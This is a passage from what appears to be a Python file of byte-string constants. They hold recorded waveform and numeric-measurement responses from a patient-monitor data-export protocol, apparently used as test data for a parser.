b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\xa1\x94\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ 
b"\x1f\xfd\x1f\xff\x20\x04\x20\x0c\x20\x14\x20\x1c\x20\x26\x20\x2f" \ b"\x20\x38\x20\x42\x20\x4b\x20\x55\x20\x5e\x20\x68\x20\x71\x20\x7a" \ b"\x20\x83\x20\x8d\x20\x96\x20\x9f\x20\xa8\x20\xad\x20\xab\x20\xa6" \ b"\x20\x9e\x20\x95\x20\x8c\x20\x82\x20\x78\x20\x6e\x20\x63\x20\x59" \ b"\x20\x4f\x20\x45\x20\x3a\x20\x30\x20\x26\x20\x1c\x20\x12\x20\x08" \ b"\x1f\xff\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x01\x04\x00" \ b"\x01\x00\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\xa0\x84\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfe\x20\x00\x20\x02\x20\x06\x20\x08\x20\x0b" \ b"\x20\x0e\x20\x10\x20\x13\x20\x17\x20\x18\x20\x1a\x20\x1d\x20\x20" \ b"\x20\x23\x20\x25\x20\x28\x20\x2b\x20\x2e\x20\x31\x20\x31\x20\x30" \ b"\x20\x2e\x20\x2d\x20\x2a\x20\x26\x20\x24\x20\x20\x20\x1f\x20\x1b" \ b"\x20\x19\x20\x15\x20\x14\x20\x10\x20\x0c\x20\x0a\x20\x08\x20\x04" \ b"\x20\x01\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x3d\x04\x00" \ b"\x01\x00\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ 
b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\xa1\x04\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x20\x01\x20\x05\x20\x0b\x20\x11\x20\x15\x20\x1d\x20\x23" \ b"\x20\x29\x20\x31\x20\x37\x20\x3d\x20\x45\x20\x4d\x20\x53\x20\x59" \ b"\x20\x5f\x20\x67\x20\x6d\x20\x73\x20\x79\x20\x7b\x20\x79\x20\x75" \ b"\x20\x6f\x20\x67\x20\x61\x20\x5b\x20\x53\x20\x4d\x20\x43\x20\x3d" \ b"\x20\x35\x20\x2f\x20\x25\x20\x1f\x20\x19\x20\x11\x20\x09\x20\x03" \ b"\x1f\xfd\x07\x8e\x00\x01\x00\x4a\x09\x6e\x00\x46\x4b\xb4\x04\x00" \ b"\x00\x40\x0b\x7b\x0b\x9f\x0b\xbd\x0b\xd5\x0b\xe8\x0b\xf6\x0b\xfe" \ b"\x0c\x00\x0b\xfc\x0b\xf3\x0b\xe5\x0b\xd2\x0b\xba\x0b\x9d\x0b\x7b" \ b"\x0b\x56\x0b\x2c\x0b\x00\x0a\xd0\x0a\x9d\x0a\x68\x0a\x31\x09\xf9" \ b"\x09\xbf\x09\x85\x09\x4b\x09\x10\x08\xd7\x08\x9e\x08\x66\x08\x30" \ b"\x07\xfb" rsp_wave_7_no_4 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x03\xb0\x00\x04\x00\x07\x03\xaa\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x03\xa0\x00\x03\x00\x03\x0e\x80\x58\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01\x03\x86\x00\x00\x00\x04" \ b"\x03\x80\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x02\x04\x00" \ b"\x01\x00\x1f\xf7\x1f\xf3\x1f\xf0\x1f\xee\x1f\xed\x1f\xed\x1f\xec" \ b"\x1f\xec\x1f\xed\x1f\xed\x1f\xed\x1f\xed\x1f\xed\x1f\xed\x1f\xed" \ b"\x1f\xed\x1f\xed\x1f\xee\x1f\xee\x1f\xee\x1f\xee\x1f\xee\x1f\xee" \ b"\x1f\xee\x1f\xee\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xef" \ b"\x1f\xef\x1f\xef\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0" \ b"\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf1\x1f\xf1\x1f\xf1" \ b"\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1" \ 
b"\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf2\x1f\xf2\x1f\xf2" \ b"\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2" \ b"\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf4\x1f\xf4\x1f\xf4" \ b"\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4" \ b"\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf5\x1f\xf5\x1f\xf5" \ b"\x1f\xf4\x1f\xf3\x1f\xf3\x1f\xf2\x1f\xf1\x1f\xf0\x1f\xf0\x1f\xef" \ b"\x1f\xed\x1f\xed\x1f\xec\x1f\xeb\x1f\xea\x1f\xe9\x1f\xe8\x1f\xe7" \ b"\x1f\xe6\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x01\x04\x00" \ b"\x01\x00\x1f\xff\x1f\xfd\x1f\xfc\x1f\xfc\x1f\xfb\x1f\xfb\x1f\xfa" \ b"\x1f\xfa\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfb" \ b"\x1f\xfb\x1f\xfb\x1f\xfa\x1f\xfa\x1f\xfa\x1f\xfa\x1f\xfa\x1f\xfa" \ b"\x1f\xfa\x1f\xfa\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfb" \ b"\x1f\xfb\x1f\xfb\x1f\xfa\x1f\xfa\x1f\xfa\x1f\xfa\x1f\xfa\x1f\xfa" \ b"\x1f\xfa\x1f\xfa\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfb\x1f\xfb\x1f\xfb" \ b"\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfb" \ b"\x1f\xfb\x1f\xfb\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfc\x1f\xfc\x1f\xfc" \ b"\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc" \ b"\x1f\xfc\x1f\xfc\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xff\x1f\xff\x1f\xff\x1f\xfe\x1f\xfe\x1f\xfe" \ b"\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe" \ b"\x1f\xfe\x1f\xfe\x20\x00\x20\x00\x20\x00\x1f\xff\x1f\xff\x1f\xff" \ b"\x20\x00\x1f\xff\x1f\xff\x1f\xfe\x1f\xfd\x1f\xfc\x1f\xfc\x1f\xfb" \ b"\x1f\xfb\x1f\xfb\x1f\xfa\x1f\xf9\x1f\xfa\x1f\xf9\x1f\xfa\x1f\xf9" \ b"\x1f\xf8\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x3d\x04\x00" \ b"\x01\x00\x1f\xf7\x1f\xf5\x1f\xf3\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1" \ 
b"\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1" \ b"\x1f\xf1\x1f\xf1\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5" \ b"\x1f\xf5\x1f\xf5\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf5\x1f\xf5\x1f\xf5" \ b"\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5" \ b"\x1f\xf5\x1f\xf5\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf5\x1f\xf5\x1f\xf5" \ b"\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5" \ b"\x1f\xf5\x1f\xf5\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf5\x1f\xf5\x1f\xf5" \ b"\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5" \ b"\x1f\xf5\x1f\xf5\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf5\x1f\xf5\x1f\xf5" \ b"\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5" \ b"\x1f\xf5\x1f\xf5\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf5\x1f\xf5\x1f\xf5" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xef\x1f\xef\x1f\xed\x1f\xed" \ b"\x1f\xed\x07\x8e\x00\x01\x00\x4a\x09\x6e\x00\x46\x4b\xb4\x04\x00" \ b"\x00\x40\x07\xc9\x07\x99\x07\x6b\x07\x40\x07\x18\x06\xf3\x06\xd2" \ b"\x06\xb3\x06\x97\x06\x7f\x06\x69\x06\x57\x06\x47\x06\x3a\x06\x2f" \ b"\x06\x27\x06\x21\x06\x1d\x06\x1a\x06\x19\x06\x19\x06\x1a\x06\x1b" \ b"\x06\x1d\x06\x1e\x06\x20\x06\x20\x06\x20\x06\x1f\x06\x1d\x06\x1a" \ b"\x06\x15" rsp_nu_8_no_1 = \ b"\xe1\x00\x00\x02\x00\x05" \ b"\x04\x1c\x01\x01\x00\x01\x00\x07\x04\x14\x00\x21\x00\x00\x00\x00" \ b"\xf1\x3b\x04\x0a\x00\x01\x00\x00\x0e\x80\x8f\x00\xff\xff\xff\xff" \ b"\xff\xff\xff\xff\x00\x01\x00\x06\x00\x00\x00\x01\x03\xf0\x00\x00" \ b"\x00\x0a\x03\xea\x86\x3f\x00\x07\x00\x46\x09\x21\x00\x02\x86\x3f" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x58\x04" \ b"\x09\x27\x00\x10\x00\x0e\x00\x43\x00\x50\x00\x50\x00\x20\x00\x20" \ 
b"\x00\x20\x00\x00\x09\x17\x00\x02\x03\x00\x09\x11\x00\x02\x00\x05" \ b"\x86\x58\x00\x07\x00\x46\x09\x21\x00\x02\x86\x58\x09\x2f\x00\x04" \ b"\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28" \ b"\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\xe0\x18\x09\x27\x00\x10" \ b"\x00\x0e\x03\x94\x6e\x29\xfe\xff\x5e\xa6\xfe\xff\x00\x20\x00\x00" \ b"\x09\x17\x00\x02\x03\x01\x09\x11\x00\x02\x00\x02\x87\x8c\x00\x09" \ b"\x00\x5a\x09\x21\x00\x02\x87\x8c\x09\x2f\x00\x04\x00\x01\x00\x06" \ b"\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00\x00\x00" \ b"\x09\x24\x00\x04\x00\x02\x4b\xb8\x09\x27\x00\x10\x00\x0e\x00\x53" \ b"\x00\x70\x00\x4f\x20\x82\x00\x20\x00\x20\x00\x00\x09\x17\x00\x02" \ b"\x03\x00\x09\x11\x00\x02\x00\x06\xf0\x08\x00\x02\x06\xd1\x09\x50" \ b"\x00\x0a\x4b\xb8\x04\x00\x02\x20\xff\x00\x03\xb6\x87\x92\x00\x07" \ b"\x00\x4e\x09\x21\x00\x02\x87\x92\x09\x2f\x00\x04\x00\x01\x00\x06" \ b"\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00\x00\x00" \ b"\x09\x24\x00\x04\x00\x02\x48\x22\x09\x27\x00\x10\x00\x0e\x81\x09" \ b"\xfe\xff\x64\x0f\xfe\xff\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02" \ b"\x00\x06\x09\x50\x00\x0a\x48\x22\x04\x01\x0a\xa0\x00\x00\x00\x3c" \ b"\x87\x96\x00\x08\x00\x54\x09\x21\x00\x02\x87\x96\x09\x2f\x00\x04" \ b"\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28" \ b"\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x4b\xb0\x09\x27\x00\x10" \ b"\x00\x0e\x70\x4c\xfe\xff\x6c\xe8\xfe\xff\x00\x20\x00\x20\x00\x00" \ b"\x09\x17\x00\x02\x02\x01\x09\x11\x00\x02\x00\x06\x09\x50\x00\x0a" \ b"\x4b\xb0\x04\x00\x02\x00\xff\x00\x00\x64\x87\xe6\x00\x0a\x00\x82" \ b"\x09\x21\x00\x02\x87\xe6\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f" \ b"\x00\x0c\x00\x00\x20\x00\x00\x01\x52\x28\x01\x03\x00\x00\x09\x24" \ b"\x00\x04\x00\x02\x4a\x04\x09\x27\x00\x10\x00\x0e\x00\x4e\x00\x42" \ b"\x00\x50\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02\x00\x01" \ b"\x09\x90\x00\x08\x20\x19\x03\x21\x16\x30\x43\x00\xf2\x37\x00\x04" \ 
b"\xff\xff\xff\xff\xf9\x98\x00\x04\xff\xff\xff\xff\x09\x4b\x00\x22" \ b"\x00\x03\x00\x1e\x4a\x05\x20\x00\x0f\x20\x00\x7f\xff\xff\x4a\x06" \ b"\x20\x00\x0f\x20\x00\x7f\xff\xff\x4a\x07\x20\x00\x0f\x20\x00\x7f" \ b"\xff\xff\x87\xe9\x00\x0a\x00\x68\x09\x21\x00\x02\x87\xe9\x09\x2f" \ b"\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01" \ b"\x52\x28\x00\x01\x00\x00\x09\x24\x00\x04\x00\x02\xf0\xe5\x09\x27" \ b"\x00\x10\x00\x0e\x81\x09\xfe\xff\x64\x0f\xfe\xff\x00\x20\x00\x20" \ b"\x00\x00\x09\x17\x00\x02\x03\x00\x09\x11\x00\x02\x00\x01\x09\x90" \ b"\x00\x08\x20\x19\x03\x21\x16\x30\x43\x00\xf9\x98\x00\x04\xff\xff" \ b"\xff\xff\x09\x50\x00\x0a\xf0\xe5\x20\x00\x0a\xa0\x00\x7f\xff\xff" \ b"\x88\x16\x00\x07\x00\x4e\x09\x21\x00\x02\x88\x16\x09\x2f\x00\x04" \ b"\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28" \ b"\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x41\x82\x09\x27\x00\x10" \ b"\x00\x0e\x00\x48\x00\x52\x00\x20\x00\x20\x00\x20\x00\x20\x00\x00" \ b"\x09\x11\x00\x02\x00\x02\x09\x50\x00\x0a\x41\x82\x04\x00\x0a\xa0" \ b"\x00\x00\x00\x3c\x88\x1d\x00\x07\x00\x4e\x09\x21\x00\x02\x88\x1d" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x50\x0a" \ b"\x09\x27\x00\x10\x00\x0e\x00\x52\x00\x52\x00\x20\x00\x20\x00\x20" \ b"\x00\x20\x00\x00\x09\x11\x00\x02\x00\x03\x09\x50\x00\x0a\x50\x0a" \ b"\x04\x00\x0a\xe0\x00\x00\x00\x0f\x88\x22\x00\x08\x00\xa0\x09\x21" \ b"\x00\x02\x88\x22\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c" \ b"\x00\x00\x20\x00\x00\x01\x42\x28\x01\x0c\x00\x00\x09\x24\x00\x04" \ b"\x00\x02\x03\x00\x09\x27\x00\x10\x00\x0e\x00\x53\x00\x54\x00\x20" \ b"\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02\x00\x02\x09\x4b" \ b"\x00\x54\x00\x08\x00\x50\x03\x01\x84\x00\x05\x12\x00\x7f\xff\xff" \ b"\x03\x02\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x3d\x84\x00\x05\x12" \ b"\x00\x7f\xff\xff\x03\x3e\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x3f" \ 
b"\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x40\x84\x00\x05\x12\x00\x7f" \ b"\xff\xff\x03\x04\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x07\x84\x00" \ b"\x05\x12\x00\x7f\xff\xff\x09\x91\x00\x04\x0e\x7e\xf0\x00" rsp_nu_8_no_2 = \ b"\xe1\x00\x00\x02\x00\x05" \ b"\x02\x50\x03\x02\x00\x01\x00\x07\x02\x48\x00\x21\x00\x00\x00\x00" \ b"\xf1\x3b\x02\x3e\x00\x01\x00\x00\x0e\x80\x8f\x00\xff\xff\xff\xff" \ b"\xff\xff\xff\xff\x00\x01\x00\x06\x00\x00\x00\x01\x02\x24\x00\x00" \ b"\x00\x09\x02\x1e\x88\x28\x00\x03\x00\x1e\x09\x21\x00\x02\x88\x28" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x24\x00\x01\x0c\x00\x80\x88\x2a\x00\x06\x00\x40\x09\x21" \ b"\x00\x02\x88\x2a\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c" \ b"\x00\x00\x20\x00\x00\x05\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04" \ b"\x00\x02\xf0\x3d\x09\x27\x00\x10\x00\x0e\x00\x53\x00\x54\x63\x07" \ b"\xfe\xff\x65\x70\xfe\xff\x00\x00\x09\x11\x00\x02\x00\x02\x88\x2f" \ b"\x00\x07\x00\x4e\x09\x21\x00\x02\x88\x2f\x09\x2f\x00\x04\x00\x01" \ b"\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00" \ b"\x00\x00\x09\x24\x00\x04\x00\x02\x42\x61\x09\x27\x00\x10\x00\x0e" \ b"\x00\x50\x00\x56\x00\x43\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11" \ b"\x00\x02\x00\x02\x09\x50\x00\x0a\x42\x61\x04\x00\x0a\xa0\x00\x00" \ b"\x00\x00\x88\x3c\x00\x06\x00\x40\x09\x21\x00\x02\x88\x3c\x09\x2f" \ b"\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01" \ b"\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x3f\x20\x09\x27" \ b"\x00\x10\x00\x0e\x00\x51\x00\x54\x00\x20\x00\x20\x00\x20\x00\x20" \ b"\x00\x00\x09\x11\x00\x02\x00\x02\x88\x3e\x00\x06\x00\x40\x09\x21" \ b"\x00\x02\x88\x3e\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c" \ b"\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04" \ b"\x00\x02\x3f\x24\x09\x27\x00\x10\x00\x0e\x00\x51\x00\x54\x00\x63" \ b"\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02\x00\x02\x88\x40" \ b"\x00\x06\x00\x40\x09\x21\x00\x02\x88\x40\x09\x2f\x00\x04\x00\x01" \ 
b"\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00" \ b"\x00\x00\x09\x24\x00\x04\x00\x02\xf1\x56\x09\x27\x00\x10\x00\x0e" \ b"\x03\x94\x00\x51\x00\x54\x00\x63\x00\x20\x00\x20\x00\x00\x09\x11" \ b"\x00\x02\x00\x02\x88\x42\x00\x06\x00\x40\x09\x21\x00\x02\x88\x42" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\xf1\x54" \ b"\x09\x27\x00\x10\x00\x0e\x00\x51\x00\x54\x00\x2d\x00\x48\x00\x52" \ b"\x00\x20\x00\x00\x09\x11\x00\x02\x00\x02\x88\x46\x00\x03\x00\x1e" \ b"\x09\x21\x00\x02\x88\x46\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f" \ b"\x00\x0c\x00\x00\x20\x00\x00\x01\x24\x00\x00\x00\x00\x80\x88\x48" \ b"\x00\x03\x00\x1e\x09\x21\x00\x02\x88\x48\x09\x2f\x00\x04\x00\x01" \ b"\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x24\x00\x00\x00" \ b"\x00\x80" rsp_nu_8_no_3 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x00\x2a\x00\x01\x00\x07\x00\x24\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x00\x1a\x00\x01\x00\x00\x0e\x80\x8f\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x06\x00\x00\x00\x00\x00\x00" rsp_wave_8_no_1 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x04\x58\x00\x04\x00\x07\x04\x52\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x04\x48\x00\x03\x00\x00\x0e\x80\x60\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01\x04\x2e\x00\x00\x00\x04" \ b"\x04\x28\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x02\x04\x00" \ b"\x01\x00\x1f\xe5\x1f\xe4\x1f\xe3\x1f\xe2\x1f\xe1\x1f\xe0\x1f\xdf" \ b"\x1f\xde\x1f\xdd\x1f\xdc\x1f\xdb\x1f\xda\x1f\xd9\x1f\xd8\x1f\xd8" \ b"\x1f\xd7\x1f\xd6\x1f\xd5\x1f\xd4\x1f\xd3\x1f\xd2\x1f\xd1\x1f\xd0" \ b"\x1f\xd0\x1f\xd0\x1f\xd1\x1f\xd3\x1f\xd4\x1f\xd5\x1f\xd7\x1f\xd8" \ b"\x1f\xd9\x1f\xdb\x1f\xdc\x1f\xde\x1f\xdf\x1f\xe0\x1f\xe2\x1f\xe3" \ b"\x1f\xe4\x1f\xe6\x1f\xe7\x1f\xe8\x1f\xe9\x1f\xeb\x1f\xec\x1f\xed" \ b"\x1f\xee\x1f\xf0\x1f\xf1\x1f\xf2\x1f\xf3\x1f\xf4\x1f\xf5\x1f\xf7" \ b"\x1f\xf8\x1f\xfa\x1f\xfb\x1f\xfc\x1f\xfc\x1f\xfd\x1f\xfd\x1f\xfd" \ 
b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x08\x11\x00\x10\x01\xb2\x09\x21\x00\x02\x08\x11\x09\x2f" \ b"\x00\x04\x00\x01\x00\x09\x09\x3f\x00\x0c\x00\x00\x08\x00\x00\x01" \ b"\x42\x80\x00\x00\x00\x00\x09\x6d\x00\x06\x00\x80\x10\x0e\x30\x00" \ b"\x0a\x16\x00\x14\x00\x04\x00\x10\x00\x04\x80\x08\x00\x03\x40\x01" \ b"\x00\x02\x80\x04\x00\x05\x40\x02\x09\x8d\x00\x04\x00\x00\x00\x10" \ b"\x09\x24\x00\x04\x00\x02\x01\x01\x09\x27\x00\x10\x00\x0e\x00\x49" \ b"\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x00\x09\x96\x00\x02" \ b"\x10\xb2\x09\x45\x00\x02\x02\x40\x09\x11\x00\x02\x00\x02\x09\x40" \ b"\x00\x02\x00\x00\x09\x6f\x00\x0c\xfe\xff\xf0\x00\xfd\x00\x9f\xfb" \ b"\x00\x00\x3f\xff\x09\x64\x00\x10\x00\x00\x00\x00\x00\x00\x00\x01" \ b"\x1f\xad\x20\x75\x00\x00\x00\x00\x09\x6a\x00\x04\x1e\x81\x21\xa1" \ b"\x09\x6e\x01\x06\x01\x01\x04\x00\x01\x00\x1f\xf7\x1f\xf8\x1f\xf7" \ b"\x1f\xf8\x1f\xf7\x1f\xf8\x1f\xf7\x1f\xf6\x1f\xf7\x1f\xf6\x1f\xf7" \ 